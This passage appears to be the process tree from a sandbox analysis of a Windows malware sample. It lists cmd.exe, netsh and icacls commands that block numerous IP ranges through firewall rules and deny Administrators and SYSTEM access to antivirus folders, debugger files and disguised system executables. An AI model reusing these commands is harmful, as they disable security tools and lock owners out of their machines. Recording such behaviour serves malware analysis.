          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
          PID:4192
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
            PID:4256
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
          PID:4828
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
            PID:5100
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
          PID:4756
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
            PID:4220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
          PID:5008
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
            PID:4984
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
          PID:4596
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
            PID:4664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
          PID:2540
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
            PID:4304
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
          PID:2260
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
            PID:2944
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
          PID:4928
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
            PID:5096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
          PID:4796
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
            PID:4260
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
          PID:2036
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
            PID:4656
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
          PID:1560
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
            PID:5084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
          PID:4976
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
            PID:2016
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
          PID:4344
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
            PID:556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
          PID:4948
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
            PID:5064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
          PID:4556
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
            PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
          PID:4292
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
            PID:4496
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
          PID:4872
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
            PID:4680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
          PID:4536
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
            PID:4612
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
          PID:5016
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
            PID:4336
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
          PID:4436
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
            PID:4676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
          PID:4216
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
            PID:5076
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
          PID:4464
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
            PID:1308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
          PID:1836
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
            PID:4744
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
          PID:4416
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
            PID:1444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
          PID:3996
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
            PID:5164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
          PID:5072
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
            PID:5172
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
          PID:5204
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
            PID:5328
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
          PID:5224
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
            PID:5340
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
          PID:5372
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
            PID:5492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
          PID:5388
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
            PID:5480
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
          PID:5540
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
            PID:5648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
          PID:5556
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
            PID:5656
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
          PID:5704
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
            PID:5812
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
          PID:5716
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
            PID:5824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
          PID:5844
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
            PID:5968
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
          PID:5864
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
            PID:5960
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
          PID:6036
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
            PID:6140
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
          PID:6048
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
            PID:5128
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
          PID:4356
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
            PID:4276
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
          PID:4408
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
            PID:5112
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
          PID:4484
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
            PID:4240
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
          PID:4332
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5552
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
          PID:4848
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
            PID:5620
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
          PID:5320
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
          PID:1520
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5252
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
          PID:5308
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
            Modifies file permissions
            PID:5496
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
          PID:5236
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
            PID:5504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
          PID:5256
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
            Modifies file permissions
            PID:5436
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
          PID:5460
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
            PID:5680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
          PID:5976
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          PID:5640
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
            PID:6016
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
          PID:6080
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5568
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
          PID:6024
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny System:(F)
            PID:5028
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
          PID:6028
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny система:(F)
            Modifies file permissions
            PID:5488
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
          PID:5808
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
            PID:5196
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          PID:5772
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
            PID:5176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
          PID:5728
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
          PID:5900
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
            PID:648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
          PID:5604
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny Администраторы:(F)
            PID:1736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
          PID:5088
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny System:(F)
            Modifies file permissions
            PID:5040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
          PID:6076
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny система:(F)
            Modifies file permissions
            PID:5124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
          PID:4896
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          PID:2504
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5412
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
          PID:4568
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
            PID:5300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          PID:5564
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
          PID:5484
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4412
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          PID:5392
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
            PID:5624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
          PID:5820
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
          PID:5476
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
          PID:5872
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
            PID:5736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          PID:5616
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:2752
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
          PID:5888
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
            PID:4340
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
          PID:4212
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny System:(F)
            PID:4444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
          PID:4844
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny Администраторы:(F)
            PID:6116
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
          PID:5368
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny System:(F)
            Modifies file permissions
            PID:5868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
          PID:5572
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5928
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
          PID:5380
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny System:(F)
            Modifies file permissions
            PID:5776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
          PID:6060
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
            PID:5904
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
          PID:5576
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny System:(F)
            PID:6112
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
          PID:4604
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny Администраторы:(F)
            PID:5596
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
          PID:4532
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny System:(F)
            Modifies file permissions
            PID:5280
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
          PID:5276
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
          PID:5944
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny System:(F)
            PID:5516
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
          PID:5964
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
            PID:4524
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
          PID:2796
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny System:(F)
            PID:5828
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
          PID:2076
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5984
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
          PID:5560
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny System:(F)
            PID:5160
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
          PID:5972
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
            PID:4200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          PID:5548
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5200
        • C:\Windows\SysWOW64\cmd.exe
